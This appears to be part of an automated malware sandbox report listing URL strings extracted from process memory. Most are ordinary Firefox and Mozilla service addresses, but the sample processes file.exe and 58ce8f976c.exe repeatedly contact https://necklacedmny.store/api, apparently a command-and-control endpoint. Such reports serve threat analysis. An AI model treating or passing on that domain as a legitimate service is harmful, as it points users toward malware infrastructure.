Source: firefox.exe, 0000001A.00000002.3224109770.0000019E3B803000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.3232516855.0000019E48100000.00000002.00000001.00040000.0000001D.sdmp, firefox.exe, 0000001A.00000002.3239630691.0000019E495BE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://monitor.firefox.com
Source: firefox.exe, 0000001A.00000002.3237977598.0000019E49010000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://monitor.firefox.com/?entrypoint=protection_report_monitor&utm_source=about-protections
Source: firefox.exe, 0000001A.00000002.3237977598.0000019E49010000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://monitor.firefox.com/about
Source: firefox.exe, 0000001A.00000002.3237977598.0000019E49010000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://monitor.firefox.com/breach-details/
Source: firefox.exe, 0000001A.00000002.3237977598.0000019E49010000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://monitor.firefox.com/oauth/init?entrypoint=protection_report_monitor&utm_source=about-protect
Source: firefox.exe, 0000001A.00000002.3237977598.0000019E49010000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://monitor.firefox.com/user/breach-stats?includeResolved=true
Source: firefox.exe, 0000001A.00000002.3237977598.0000019E49010000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://monitor.firefox.com/user/dashboard
Source: firefox.exe, 0000001A.00000002.3237977598.0000019E49010000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://monitor.firefox.com/user/preferences
Source: firefox.exe, 0000001A.00000002.3237977598.0000019E49010000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://mozilla-ohttp-fakespot.fastly-edge.com/
Source: firefox.exe, 0000001A.00000002.3237977598.0000019E49010000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://mozilla.cloudflare-dns.com/dns-query
Source: firefox.exe, 0000001A.00000002.3232516855.0000019E48100000.00000002.00000001.00040000.0000001D.sdmp String found in binary or memory: https://mozilla.org/W
Source: firefox.exe, 0000001A.00000002.3232516855.0000019E48100000.00000002.00000001.00040000.0000001D.sdmp String found in binary or memory: https://mzl.la/3NS9KJd
Source: file.exe, 00000000.00000003.2231452850.000000000156E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://necklacedmny.store
Source: 58ce8f976c.exe, 0000000A.00000003.2971263867.0000000000FBF000.00000004.00000020.00020000.00000000.sdmp, 58ce8f976c.exe, 0000000A.00000003.2911175052.0000000000F9F000.00000004.00000020.00020000.00000000.sdmp, 58ce8f976c.exe, 0000000A.00000003.2980379143.0000000000FBF000.00000004.00000020.00020000.00000000.sdmp, 58ce8f976c.exe, 0000000A.00000003.3094090428.0000000000FC3000.00000004.00000020.00020000.00000000.sdmp, 58ce8f976c.exe, 0000000C.00000003.3203204120.00000000018DE000.00000004.00000020.00020000.00000000.sdmp, 58ce8f976c.exe, 0000000C.00000003.3131133881.00000000018DE000.00000004.00000020.00020000.00000000.sdmp, 58ce8f976c.exe, 0000000C.00000003.3138408920.00000000018E0000.00000004.00000020.00020000.00000000.sdmp, 58ce8f976c.exe, 0000000C.00000003.3067807604.0000000005FDE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://necklacedmny.store/
Source: 58ce8f976c.exe, 0000000A.00000003.2980379143.0000000000FBF000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://necklacedmny.store/4
Source: 58ce8f976c.exe, 0000000C.00000003.3203204120.00000000018DE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://necklacedmny.store/7p4
Source: 58ce8f976c.exe, 0000000A.00000003.2980379143.0000000000FBF000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://necklacedmny.store/D
Source: 58ce8f976c.exe, 0000000C.00000003.3067807604.0000000005FDE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://necklacedmny.store/L~
Source: 58ce8f976c.exe, 0000000C.00000003.3161372475.0000000005FDD000.00000004.00000800.00020000.00000000.sdmp, 58ce8f976c.exe, 0000000C.00000003.3161906847.00000000018F9000.00000004.00000020.00020000.00000000.sdmp, 58ce8f976c.exe, 0000000C.00000003.3049628457.00000000018DE000.00000004.00000020.00020000.00000000.sdmp, 58ce8f976c.exe, 0000000C.00000003.3104075397.0000000005FD8000.00000004.00000800.00020000.00000000.sdmp, 58ce8f976c.exe, 0000000C.00000003.3067807604.0000000005FDE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://necklacedmny.store/api
Source: file.exe, 00000000.00000003.2173591731.0000000001538000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://necklacedmny.store/api%H
Source: 58ce8f976c.exe, 0000000C.00000003.3067807604.0000000005FDE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://necklacedmny.store/api9
Source: 58ce8f976c.exe, 0000000C.00000003.3201552486.0000000005FDD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://necklacedmny.store/api:
Source: file.exe, 00000000.00000003.2230773204.0000000001546000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://necklacedmny.store/apiD
Source: 58ce8f976c.exe, 0000000C.00000003.3083289579.0000000005FDA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://necklacedmny.store/apiMg
Source: 58ce8f976c.exe, 0000000C.00000003.3083289579.0000000005FDA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://necklacedmny.store/apiNBR
Source: file.exe, 00000000.00000003.2244012990.000000000156B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2269139740.000000000156C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://necklacedmny.store/apiT
Source: 58ce8f976c.exe, 0000000A.00000003.2911175052.0000000000F9F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://necklacedmny.store/apienw:
Source: file.exe, 00000000.00000003.2269022223.0000000001538000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://necklacedmny.store/apif
Source: 58ce8f976c.exe, 0000000A.00000003.3094128687.0000000000F9F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://necklacedmny.store/apioW
Source: 58ce8f976c.exe, 0000000A.00000003.2964739000.0000000000FBF000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://necklacedmny.store/apip
Source: 58ce8f976c.exe, 0000000A.00000003.2895497004.0000000000FA9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://necklacedmny.store/f~
Source: firefox.exe, 0000001A.00000002.3237977598.0000019E49010000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://normandy.cdn.mozilla.net/api/v1
Source: firefox.exe, 0000001A.00000002.3237977598.0000019E49010000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://oauth.accounts.firefox.com/v1
Source: firefox.exe, 0000001A.00000002.3231295540.0000019E47EDF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ok.ru/
Source: firefox.exe, 0000001A.00000002.3237977598.0000019E49010000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://play.google.com/store/apps/details?id=org.mozilla.firefox&referrer=utm_source%3Dprotection_r
Source: firefox.exe, 0000001A.00000002.3237977598.0000019E49010000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://play.google.com/store/apps/details?id=org.mozilla.firefox.vpn&referrer=utm_source%3Dfirefox-
Source: firefox.exe, 0000001A.00000002.3239630691.0000019E4954E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://poczta.interia.pl/mh/?mailto=%sx
Source: firefox.exe, 0000001A.00000002.3237977598.0000019E49010000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://prod.ohttp-gateway.prod.webservices.mozgcp.net/ohttp-configs
Source: firefox.exe, 0000001A.00000002.3237977598.0000019E49010000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://profile.accounts.firefox.com/v1
Source: firefox.exe, 0000001A.00000002.3232516855.0000019E48100000.00000002.00000001.00040000.0000001D.sdmp String found in binary or memory: https://profiler.firefox.com
Source: firefox.exe, 0000001A.00000002.3239630691.0000019E4954E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://profiler.firefox.com/
Source: firefox.exe, 0000001A.00000002.3232273931.0000019E47F00000.00000002.00000001.00040000.0000001C.sdmp String found in binary or memory: https://reactjs.org/docs/error-decoder.html?invariant=
Source: firefox.exe, 0000001A.00000002.3231295540.0000019E47E75000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://redux.js.org/api-reference/store#subscribe(listener)
Source: firefox.exe, 0000001A.00000002.3237977598.0000019E49010000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://relay.firefox.com/accounts/profile/?utm_medium=firefox-desktop&utm_source=modal&utm_campaign
Source: firefox.exe, 0000001A.00000002.3237977598.0000019E49010000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://relay.firefox.com/api/v1/
Source: firefox.exe, 0000001A.00000002.3237977598.0000019E49010000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://safebrowsing.google.com/safebrowsing/diagnostic?site=
Source: firefox.exe, 0000001A.00000002.3231295540.0000019E47EDF000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.3237977598.0000019E49010000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://safebrowsing.google.com/safebrowsing/downloads?client=SAFEBROWSING_ID&appver=%MAJOR_VERSION%
Source: firefox.exe, 0000001A.00000002.3286844037.0000019E4DC05000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://safebrowsing.google.com/safebrowsing/downloads?client=SAFEBROWSING_ID&appver=118.0&pver=2.2&
Source: firefox.exe, 0000001A.00000002.3237977598.0000019E49010000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://safebrowsing.google.com/safebrowsing/gethash?client=SAFEBROWSING_ID&appver=%MAJOR_VERSION%&p
Source: firefox.exe, 0000001A.00000002.3264016612.0000019E4C115000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://safebrowsing.google.com/safebrowsing/gethash?client=SAFEBROWSING_ID&appver=118.0&pver=2.2
Source: firefox.exe, 0000001A.00000002.3237977598.0000019E49010000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://safebrowsing.googleapis.com/v4/fullHashes:find?$ct=application/x-protobuf&key=%GOOGLE_SAFEBR
Source: firefox.exe, 0000001A.00000002.3286844037.0000019E4DC05000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://safebrowsing.googleapis.com/v4/fullHashes:find?$ct=application/x-protobuf&key=AIzaSyC7jsptDS
Source: firefox.exe, 0000001A.00000002.3237977598.0000019E49010000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://safebrowsing.googleapis.com/v4/threatHits?$ct=application/x-protobuf&key=%GOOGLE_SAFEBROWSIN
Source: firefox.exe, 0000001A.00000002.3237977598.0000019E49010000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://safebrowsing.googleapis.com/v4/threatListUpdates:fetch?$ct=application/x-protobuf&key=%GOOGL
Source: firefox.exe, 0000001A.00000002.3231295540.0000019E47E75000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://safebrowsing.googleapis.com/v4/threatListUpdates:fetch?$ct=application/x-protobuf&key=AIzaSy
Source: firefox.exe, 0000001A.00000002.3237977598.0000019E49010000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://sb-ssl.google.com/safebrowsing/clientreport/download?key=%GOOGLE_SAFEBROWSING_API_KEY%
Source: firefox.exe, 0000001A.00000002.3224109770.0000019E3B803000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.3232516855.0000019E48100000.00000002.00000001.00040000.0000001D.sdmp, firefox.exe, 0000001A.00000002.3239630691.0000019E495BE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://screenshots.firefox.com
Source: firefox.exe, 0000001A.00000003.3085359079.0000019E4B80F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.3247984693.0000019E4B603000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://screenshots.firefox.com/
Source: firefox.exe, 0000001A.00000002.3237977598.0000019E49010000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://services.addons.mozilla.org/api/v4/abuse/report/addon/
Source: firefox.exe, 0000001A.00000002.3237977598.0000019E49010000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://services.addons.mozilla.org/api/v4/addons/addon/
Source: firefox.exe, 0000001A.00000002.3237977598.0000019E49010000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://services.addons.mozilla.org/api/v4/addons/language-tools/?app=firefox&type=language&appversi
Source: firefox.exe, 0000001A.00000002.3237977598.0000019E49010000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://services.addons.mozilla.org/api/v4/addons/search/?guid=%IDS%&lang=%LOCALE%
Source: firefox.exe, 0000001A.00000002.3237977598.0000019E49010000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://services.addons.mozilla.org/api/v4/discovery/?lang=%LOCALE%&edition=%DISTRIBUTION%
Source: firefox.exe, 0000001A.00000002.3237977598.0000019E49010000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://services.addons.mozilla.org/api/v5/addons/browser-mappings/?browser=%BROWSER%
Source: firefox.exe, 0000001A.00000002.3237977598.0000019E49010000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://shavar.services.mozilla.com/downloads?client=SAFEBROWSING_ID&appver=%MAJOR_VERSION%&pver=2.2
Source: firefox.exe, 0000001A.00000002.3264016612.0000019E4C115000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://shavar.services.mozilla.com/downloads?client=SAFEBROWSING_ID&appver=118.0&pver=2.2
Source: firefox.exe, 0000001A.00000002.3264016612.0000019E4C115000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://shavar.services.mozilla.com/downloads?client=SAFEBROWSING_ID&appver=118.0&pver=2.2resource:/
Source: firefox.exe, 0000001A.00000002.3276626657.0000019E4CD52000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://shavar.services.mozilla.com/downloads?client=navclient-auto-ffox&appver=118.0&pver=2.2
Source: firefox.exe, 0000001A.00000002.3237977598.0000019E49010000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://shavar.services.mozilla.com/gethash?client=SAFEBROWSING_ID&appver=%MAJOR_VERSION%&pver=2.2
Source: firefox.exe, 0000001A.00000002.3264016612.0000019E4C115000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://shavar.services.mozilla.com/gethash?client=SAFEBROWSING_ID&appver=118.0&pver=2.2
Source: firefox.exe, 0000001A.00000002.3264016612.0000019E4C115000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://shavar.services.mozilla.com/gethash?client=SAFEBROWSING_ID&appver=118.0&pver=2.29FHiY4uhCsN7
Source: firefox.exe, 0000001A.00000002.3254465653.0000019E4BC13000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://smartblock.firefox.etp/facebook.svg
Source: firefox.exe, 0000001A.00000002.3254465653.0000019E4BC13000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://smartblock.firefox.etp/play.svg
Source: firefox.exe, 0000001A.00000002.3237977598.0000019E49010000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://snippets.cdn.mozilla.net/%STARTPAGE_VERSION%/%NAME%/%VERSION%/%APPBUILDID%/%BUILD_TARGET%/%L
Source: firefox.exe, 0000001A.00000002.3232273931.0000019E47F00000.00000002.00000001.00040000.0000001C.sdmp String found in binary or memory: https://snippets.mozilla.com/show/
Source: firefox.exe, 0000001A.00000002.3260229875.0000019E4C068000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://spocs.getpocket.com
Source: firefox.exe, 0000001A.00000003.3147296630.0000019E53C6A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000003.3165170400.0000019E4E0ED000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://spocs.getpocket.com/
Source: firefox.exe, 0000001A.00000002.3276626657.0000019E4CD67000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://spocs.getpocket.com/spocs
Source: firefox.exe, 0000001A.00000003.3147296630.0000019E53CA6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://spocs.getpocket.com/spocs#
Source: firefox.exe, 0000001A.00000003.3147296630.0000019E53CA6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://spocs.getpocket.com/spocs#l
Source: firefox.exe, 0000001A.00000002.3231295540.0000019E47EDF000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.3239630691.0000019E4954E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.3234086295.0000019E48C79000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://spocs.getpocket.com/user
Source: firefox.exe, 0000001A.00000002.3260229875.0000019E4C00E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.3231295540.0000019E47EDF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://static.adsafeprotected.com/firefox-etp-js
Source: firefox.exe, 0000001A.00000002.3264016612.0000019E4C108000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://static.adsafeprotected.com/firefox-etp-pixel
Source: firefox.exe, 0000001A.00000002.3224109770.0000019E3B803000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.3232516855.0000019E48100000.00000002.00000001.00040000.0000001D.sdmp, firefox.exe, 0000001A.00000002.3239630691.0000019E495BE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org
Source: firefox.exe, 0000001A.00000002.3237977598.0000019E49010000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/
Source: firefox.exe, 0000001A.00000002.3237977598.0000019E49010000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/cross-site-tracking-report
Source: firefox.exe, 0000001A.00000002.3237977598.0000019E49010000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/cryptominers-report
Source: firefox.exe, 0000001A.00000002.3237977598.0000019E49010000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/fingerprinters-report
Source: firefox.exe, 0000001A.00000002.3237977598.0000019E49010000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/firefox-relay-integration
Source: firefox.exe, 0000001A.00000002.3237977598.0000019E49010000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/password-manager-report
Source: firefox.exe, 0000001A.00000002.3237977598.0000019E49010000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/search-user-removal
Source: firefox.exe, 0000001A.00000002.3237977598.0000019E49010000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/send-tab
Source: firefox.exe, 0000001A.00000002.3237977598.0000019E49010000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/shield
Source: firefox.exe, 0000001A.00000002.3237977598.0000019E49010000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/social-media-tracking-report
Source: firefox.exe, 0000001A.00000002.3281903988.0000019E4D084000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/switching-devices?utm_source=panel-def
Source: firefox.exe, 0000001A.00000002.3281903988.0000019E4D084000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/switching-devices?utm_source=spotlight
Source: firefox.exe, 0000001A.00000002.3237977598.0000019E49010000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/tracking-content-report
Source: firefox.exe, 0000001A.00000003.3169464737.0000019E4DEB7000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/1/firefox/118.0.1/WINNT/en-US/
Source: firefox.exe, 0000001A.00000002.3231295540.0000019E47EDF000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.3237977598.0000019E49010000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/kb/captive-portal
Source: 58ce8f976c.exe, 0000000C.00000003.3089311175.00000000060F6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: firefox.exe, 0000001A.00000002.3232516855.0000019E48100000.00000002.00000001.00040000.0000001D.sdmp String found in binary or memory: https://support.mozilla.org/kb/firefox-crashes-troubleshoot-prevent-and-get-help
Source: firefox.exe, 0000001A.00000002.3264016612.0000019E4C115000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/kb/firefox-crashes-troubleshoot-prevent-and-get-helptoolbar-menubar
Source: firefox.exe, 0000001A.00000002.3285958832.0000019E4DA19000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/kb/fix-video-audio-problems-firefox-windows
Source: firefox.exe, 0000001A.00000002.3266603908.0000019E4C266000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/kb/fix-video-audio-problems-firefox-windowsMediaPlatformDecoderNotFound
Source: firefox.exe, 0000001A.00000002.3266603908.0000019E4C266000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/kb/fix-video-audio-problems-firefox-windowsMediaWMFNeeded
Source: firefox.exe, 0000001A.00000002.3273423332.0000019E4C980000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/kb/fix-video-audio-problems-firefox-windowsThe
Source: firefox.exe, 0000001A.00000002.3273423332.0000019E4C980000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/kb/fix-video-audio-problems-firefox-windowsUse
Source: firefox.exe, 0000001A.00000002.3264016612.0000019E4C115000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/kb/refresh-firefox-reset-add-ons-and-settings
Source: firefox.exe, 0000001A.00000002.3264016612.0000019E4C115000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/kb/refresh-firefox-reset-add-ons-and-settingschrome://browser/content/mi
Source: firefox.exe, 0000001A.00000002.3232516855.0000019E48100000.00000002.00000001.00040000.0000001D.sdmp, firefox.exe, 0000001A.00000002.3264016612.0000019E4C115000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/kb/warning-unresponsive-script#w_other-causes
Source: firefox.exe, 0000001A.00000002.3264016612.0000019E4C115000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/kb/warning-unresponsive-script#w_other-causesgetCanApplyUpdates
Source: firefox.exe, 0000001A.00000002.3232516855.0000019E48100000.00000002.00000001.00040000.0000001D.sdmp, firefox.exe, 0000001A.00000002.3264016612.0000019E4C115000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/kb/website-translation
Source: firefox.exe, 0000001A.00000002.3264016612.0000019E4C115000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/kb/website-translationresource://gre/modules/PrivateBrowsingUtils.sys.mj
Source: 58ce8f976c.exe, 0000000C.00000003.3089311175.00000000060F6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
Source: firefox.exe, 0000001A.00000003.3113463433.0000019E53D23000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://tc39.github.io/ecma262/#sec-typeof-operator
Source: firefox.exe, 0000001A.00000002.3237977598.0000019E49010000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://token.services.mozilla.com/1.0/sync/1.5
Source: firefox.exe, 0000001A.00000002.3285958832.0000019E4DA19000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://tools.ietf.org/html/draft-ietf-httpbis-encryption-encoding-02#section-2
Source: firefox.exe, 0000001A.00000002.3285958832.0000019E4DA19000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://tools.ietf.org/html/draft-ietf-httpbis-encryption-encoding-02#section-3.1
Source: firefox.exe, 0000001A.00000002.3285958832.0000019E4DA19000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://tools.ietf.org/html/draft-ietf-httpbis-encryption-encoding-02#section-4
Source: firefox.exe, 0000001A.00000002.3285958832.0000019E4DA19000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://tools.ietf.org/html/rfc7515#appendix-C)
Source: firefox.exe, 0000001A.00000002.3237977598.0000019E49010000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://topsites.services.mozilla.com/cid/
Source: firefox.exe, 0000001A.00000002.3237977598.0000019E49010000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://tracking-protection-issues.herokuapp.com/new
Source: firefox.exe, 0000001A.00000002.3224109770.0000019E3B803000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.3232516855.0000019E48100000.00000002.00000001.00040000.0000001D.sdmp String found in binary or memory: https://truecolors.firefox.com
Source: firefox.exe, 0000001A.00000002.3232516855.0000019E48100000.00000002.00000001.00040000.0000001D.sdmp String found in binary or memory: https://twitter.com
Source: firefox.exe, 0000001A.00000002.3234086295.0000019E48C79000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://twitter.com/
Source: firefox.exe, 0000001A.00000002.3237977598.0000019E49010000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://versioncheck-bg.addons.mozilla.org/update/VersionCheck.php?reqVersion=%REQ_VERSION%&id=%ITEM
Source: firefox.exe, 0000001A.00000002.3237977598.0000019E49010000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://versioncheck.addons.mozilla.org/update/VersionCheck.php?reqVersion=%REQ_VERSION%&id=%ITEM_ID
Source: firefox.exe, 0000001A.00000002.3231295540.0000019E47EDF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://vk.com/
Source: firefox.exe, 0000001A.00000002.3237977598.0000019E49010000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://vpn.mozilla.org/?utm_source=firefox-browser&utm_medium=firefox-%CHANNEL%-browser&utm_campaig
Source: firefox.exe, 0000001A.00000002.3237977598.0000019E49010000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://vpn.mozilla.org/?utm_source=firefox-browser&utm_medium=firefox-browser&utm_campaign=about-pr
Source: firefox.exe, 0000001A.00000002.3237977598.0000019E49010000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://webcompat.com/issues/new
Source: firefox.exe, 0000001A.00000002.3237977598.0000019E49010000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://webextensions.settings.services.mozilla.com/v1
Source: firefox.exe, 0000001A.00000002.3231295540.0000019E47EDF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://weibo.com/
Source: firefox.exe, 0000001A.00000003.3113463433.0000019E53D23000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://wicg.github.io/construct-stylesheets/#using-constructed-stylesheets).
Source: firefox.exe, 0000001A.00000002.3231295540.0000019E47EDF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.aliexpress.com/
Source: file.exe, 00000000.00000003.2214880868.0000000005BD9000.00000004.00000800.00020000.00000000.sdmp, 58ce8f976c.exe, 0000000A.00000003.2926473817.0000000000FCC000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.3239630691.0000019E4954E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.3234086295.0000019E48C79000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_86277c656a4bd7d619968160e91c45fd066919bb3bd119b3
Source: firefox.exe, 0000001A.00000002.3254465653.0000019E4BC13000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000003.3086228555.0000019E4B852000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000003.3084909437.0000019E4B600000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000003.3085359079.0000019E4B80F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.amazon.com/exec/obidos/external-search/
Source: firefox.exe, 0000001A.00000002.3264016612.0000019E4C115000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.amazon.com/exec/obidos/external-search/?field-keywords=&ie=UTF-8&mode=blended&tag=mozill
Source: firefox.exe, 0000001A.00000002.3264016612.0000019E4C115000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.amazon.com/exec/obidos/external-search/?field-keywords=&ie=utf-8&mode=blended&tag=mozill
